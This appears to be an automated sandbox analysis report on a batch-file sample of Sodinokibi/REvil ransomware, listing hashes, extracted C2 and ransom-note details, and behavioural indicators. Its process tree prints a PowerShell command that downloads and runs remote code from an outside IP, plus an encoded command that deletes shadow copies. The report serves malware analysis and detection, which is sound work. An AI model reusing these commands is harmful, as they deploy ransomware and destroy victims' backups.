Analysis
-
max time kernel
34s -
max time network
54s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
02-05-2020 07:10
Static task
static1
Behavioral task
behavioral1
Sample
d9m2D1ds.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
d9m2D1ds.bat
Resource
win10v200430
General
-
Target
d9m2D1ds.bat
-
Size
195B
-
MD5
6e7b679050b6a217806403c4caeba81a
-
SHA1
98883268db2d45bea8e55862916cc88253aef3ed
-
SHA256
cb1606e450c581937346e52cb3296fef1a6579bac3b8f21c20cb504b1d73fa95
-
SHA512
bc63deef825deaacfd533b60551b5b91ae5925463e3bd92aeccec6c043c4f841d1d660ea7f14071d7483fca0c2cb27b24c1608e2a3a147dfe02d93d1d340bc55
Malware Config
Extracted
http://185.103.242.78/pastes/d9m2D1ds
Extracted
C:\52cpxh1-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3CC24F6FDDFCE86E
http://decryptor.cc/3CC24F6FDDFCE86E
Signatures
-
Enumerates connected drives 3 TTPs
-
Drops file in Program Files directory 18 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\SwitchMount.pptm powershell.exe File opened for modification \??\c:\program files\TraceBackup.m1v powershell.exe File created \??\c:\program files\52cpxh1-readme.txt powershell.exe File created \??\c:\program files (x86)\52cpxh1-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertFromResize.dotx powershell.exe File opened for modification \??\c:\program files\LockSelect.ppsm powershell.exe File opened for modification \??\c:\program files\RegisterDebug.php powershell.exe File opened for modification \??\c:\program files\StepConvert.mpeg powershell.exe File opened for modification \??\c:\program files\InitializeReceive.css powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\52cpxh1-readme.txt powershell.exe File opened for modification \??\c:\program files\StepSave.dotm powershell.exe File opened for modification \??\c:\program files\UseAssert.svgz powershell.exe File opened for modification \??\c:\program files\AssertRemove.eps powershell.exe File opened for modification \??\c:\program files\ConnectSet.kix powershell.exe File opened for modification \??\c:\program files\InvokeSave.pub powershell.exe File created \??\c:\program files\microsoft sql server compact edition\52cpxh1-readme.txt powershell.exe File opened for modification \??\c:\program files\SuspendRestore.3gp powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\52cpxh1-readme.txt powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\gf6z7c8twci.bmp" powershell.exe -
Makes http(s) request 1 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 1 http://185.103.242.78/pastes/d9m2D1ds -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1288 powershell.exe Token: SeDebugPrivilege 1288 powershell.exe Token: SeDebugPrivilege 288 powershell.exe Token: SeBackupPrivilege 1736 vssvc.exe Token: SeRestorePrivilege 1736 vssvc.exe Token: SeAuditPrivilege 1736 vssvc.exe Token: SeTakeOwnershipPrivilege 1288 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 872 wrote to memory of 1288 872 cmd.exe powershell.exe PID 1288 wrote to memory of 288 1288 powershell.exe powershell.exe PID 1288 wrote to memory of 288 1288 powershell.exe powershell.exe PID 1288 wrote to memory of 288 1288 powershell.exe powershell.exe PID 1288 wrote to memory of 288 1288 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1288 powershell.exe 1288 powershell.exe 1288 powershell.exe 288 powershell.exe 288 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 1288 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1288 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\d9m2D1ds.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d9m2D1ds');Invoke-COTPIVXHNYHR;Start-Sleep -s 10000"2⤵
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1288 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:288
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1736